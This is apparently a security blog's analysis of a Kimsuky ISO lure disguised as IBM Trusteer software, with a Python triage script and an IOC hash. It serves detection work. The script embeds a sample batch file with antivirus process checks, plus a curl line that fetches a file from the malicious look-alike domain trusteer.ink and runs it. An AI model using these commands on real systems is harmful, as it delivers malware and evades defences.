Sample Analysis of Kimsuky's Attacks - iso

2024-12-18 Sec AI

https://www.secai.ai/blog/latest_research/Sample-Analysis-of-Kimsuky's-Attacks-iso

SecAI analyzed a Kimsuky ISO lure that masqueraded as RapportSetup (the IBM Trusteer Rapport installer). Opening the lure executed a malicious LNK and a BAT script while also launching legitimate IBM Trusteer-branded software as cover. The BAT script first checked for running Avast and Kaspersky processes, then used curl to download follow-on content from URLs on trusteer.ink, a domain chosen to imitate IBM Trusteer; that content included a macro-associated payload path and the C2 infrastructure. The source links the sample to Kimsuky activity observed in 2024 against South Korean and allied targets, including embassy-, construction-, and university-themed lures used for information theft and remote control.
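The two BAT behaviours the write-up describes, an anti-virus process check followed by a curl download from a brand look-alike domain, are easy to triage statically. The script below is an added example written for this page, not SecAI's code and not the Kimsuky script itself: the batch text it scans is constructed for demonstration, the assumption that the script aborts when Avast or Kaspersky is found is the author's and not stated in the write-up, and the process names (AvastUI.exe, AvastSvc.exe for Avast; avp.exe for Kaspersky) and the legitimate-brand domains used for the look-alike check are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample batch script for demonstration only. It is NOT the
# contents of the Kimsuky BAT; it reproduces only the two behaviours the
# write-up describes (AV process check, curl download from trusteer.ink).
# The "exit on AV found" logic is an assumption, not something the page states.
SAMPLE_BAT = r"""
@echo off
tasklist | findstr /i "avastui.exe" >nul && exit
tasklist | findstr /i "avp.exe" >nul && exit
curl -s -o "%TEMP%\update.dat" "http://trusteer.ink/path/update.dat"
start "" "%TEMP%\update.dat"
"""

# Assumed indicators: AV process names for Avast/Kaspersky, the look-alike
# domain named in the write-up, and the brand domains it imitates.
AV_PROCESS_NAMES = {"avastui.exe", "avastsvc.exe", "avp.exe"}
SUSPECT_DOMAINS = {"trusteer.ink"}
LEGIT_DOMAINS = {"trusteer.com", "ibm.com"}

# Process-enumeration commands commonly used by batch scripts to check for AV.
AV_CHECK_RE = re.compile(r"\b(tasklist|wmic\s+process|sc\s+query)\b", re.I)
PROC_RE = re.compile(r"\b([A-Za-z0-9_\-]+\.exe)\b", re.I)
# Built-in downloaders frequently abused by lure scripts.
DOWNLOADER_RE = re.compile(r"\b(curl|certutil|bitsadmin|powershell)\b", re.I)
URL_RE = re.compile(r"https?://([^/\s\"']+)(/[^\s\"']*)?", re.I)


@dataclass
class Finding:
    line_no: int
    kind: str
    detail: str


def looks_like_brand_spoof(host: str) -> bool:
    """True if the host reuses a legitimate brand's label under a different TLD."""
    parts = host.lower().split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    for legit in LEGIT_DOMAINS:
        legit_label, legit_tld = legit.rsplit(".", 1)
        if label == legit_label and not host.lower().endswith("." + legit_tld) and host.lower() != legit:
            return True
    return False


def triage_bat(text: str) -> list:
    """Scan batch-script text and return findings for AV checks and look-alike downloads."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if AV_CHECK_RE.search(line):
            procs = {p.lower() for p in PROC_RE.findall(line)}
            hits = procs & AV_PROCESS_NAMES
            if hits:
                findings.append(Finding(n, "av_evasion_check", ",".join(sorted(hits))))
        if DOWNLOADER_RE.search(line):
            for host, path in URL_RE.findall(line):
                host_l = host.lower()
                if host_l in SUSPECT_DOMAINS or looks_like_brand_spoof(host_l):
                    findings.append(Finding(n, "lookalike_download", host_l + (path or "")))
    return findings


if __name__ == "__main__":
    for f in triage_bat(SAMPLE_BAT):
        print(f"line {f.line_no}: {f.kind} -> {f.detail}")
```

The look-alike check deliberately keys on the registrable label rather than the full domain, so a previously unseen TLD variant of the same brand is still flagged; the fixed SUSPECT_DOMAINS set covers the exact indicator from the write-up.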

Indicators of Compromise

Type   Value                               First Seen   Last Seen
HASH   296650b7faefae250ba871f043551b91    2024-12-18   2024-12-18
